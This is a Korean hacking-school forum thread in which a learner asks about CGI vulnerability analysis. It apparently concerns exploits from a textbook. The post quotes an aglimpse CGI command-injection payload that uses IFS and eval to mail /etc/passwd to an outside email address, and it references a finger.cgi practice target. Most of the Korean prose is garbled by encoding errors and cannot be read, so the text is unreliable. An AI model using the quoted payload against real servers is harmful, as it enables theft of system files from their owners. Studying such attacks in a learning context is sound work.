ý ŷ

 1574, 9/79 ȸ  α  
   Lenfried
   cgiijʸ м Ϸ մϴ.

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=1071 []


å ִ md-webscan ̿Ͽ ˻ Ǵ cgi ϰ , exploit 'ҽ' ߻ Ʈ ּ մϴ.

޴ - ϰ ִµ 274page 80 Ʈ ̿Ͽ ϴ
exploit ̶ finger.cgi ̿ ǽ
ּҿ ̶ ذ ʽϴ;
(/cgi-bin/aglimpse/80|IFS=5;CMD=5mail5ilchuks\@hanmail.net\</etc/passwd;eval$CMD;echo) ľϴ ǹ̵ ñϰ...

figner.cgi ǽʿ ּҰ
(http://ftz.myip.org/~realhack/cgi-bin/finger.cgi?user=mirable) Ǿִµ
ȣƮ/~realhack ̺κ finger.cgi ġ cgi-bin ȿ Ǿִ° user=mirable mirable ִٴ ̱ κп ذ ʳ׿;

ģ 亯ֽø аڽϴ~

  Hit : 4907     Date : 2009/03/29 05:30



    
md.house Ŀ𿡼 ֱٿ ƿ ŷ ߿ ̳׿.
׳ å ۱ غ鼭 § ϰ ¯̴ Ŀ ʰ ̷ ʵ̶ ٸ Դϴ.

׷ ŸԵ..
Ϸ ʿմϴ.
켱 "ͳ ͽ÷η" α׷ ȭ ٵ, dz ƹ Ŭؼ "ͳ ͽ÷η" α׷ ϴ α׷, ˾ƾߵ˴ϴ.
ͳ ͽ÷η α׷ ְ غ HTTP ܾ ɰ̴ϴ. ͳ ּ ׻ տ <a href=http:// target=_blank>http:// </a> . http ° ü ˾ƾ߸ ְ ˴ϴ.

, , Ŭ̾Ʈ, ø̼ ̷ ϰ ɰ̴ϴ.

ϴ , http , ͳ ͽ÷η ϴ α׷ ˰ ̱ Ұ̴ϴ. ׳ ̹ ƹų ˻غ ˻ ũ ̰ ְ ɰű, μ CGI ° ְ ˴ϴ.
, DB, cgi, php, asp, jsp ̷ ܾ ϰ ٵ 밡 α׷ Ѿ ˴ϴ.

ǻͶ ̴° ᱹ α׷̰ ƮԴϴ. ǻ͸ ְ ٷ α׷ Ҽ . Ϲ ǻͱ ִ ŷ/ о߿ ʿ䵵 α׷ ų ־ߵ˴ϴ.

CGI ˰ڴµ.. ׷ װ ·ٰ? ϴ , CGI  ʰ . CGI 켱 ġϴ ˾ƾߵǰ, ġ ϰ ϴ ˾ƾߵǰ, ׷ ߵǰ, CGI  ˴ϴ.

ø ذ˴ϴ.
2009/03/29  
Lenfried ģ 亯 մϴ. ֽ Ű带 ֽ θ غ߰ڱ. 2009/03/29  
1414   Ưapi ŷα׷    
03/21 4982
1413   ŷ ?[3]     Koosha
11/02 4977
1412   Ͻ / ٲٴ¹ / dos [2]     centinel
12/11 4973
1411     [re] ŷ ޴ --..    
09/26 4947
1410   ⺻ ŷ ؼ[8]     wkdtjdrb98
10/14 4943
1409   ....ttl 128̶ ϴ;[4]     ʱ
03/28 4940
1408   ݺ ŷ [1]     ehrdlfwn
08/22 4933
1407   Ȥ ftz ٸ ŷ [3]     lMaxl04
05/17 4932
1406   յ ŷ[6]     Pang
08/18 4923
1405   ۽ĵ4.0 ǽĵ [1]     inho1214
07/11 4920
1404   ÷̿ ؼ ˰ź??[8]     philomylove
10/19 4918
  cgiijʸ м Ϸ մϴ.[2]     Lenfried
03/29 4906
1402   Ƕ??[1]     patk5713
05/16 4903
1401   xp home 񽺿 telnet ϴ°ǰ?[3]    
07/31 4885
1400   ޴ ŷ[1]     ya2ho
08/17 4848
1399   Hŷ,,[8]     HĿ
01/09 4825
1398   б  dmz ϰ ..[3]     ssjj123
11/07 4812
1397   α׷ Ű ֽǺ..ʱ 30 帱     outlinedrum
12/21 4809
1396   ǽù Gclean α׷ ˷ ּ [2]     wqw3
04/16 4797
1395   ٸ `..`Ϸ?[9]     ŷȲ
08/17 4794
[1][2][3][4][5][6][7][8] 9 [10]..[79]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org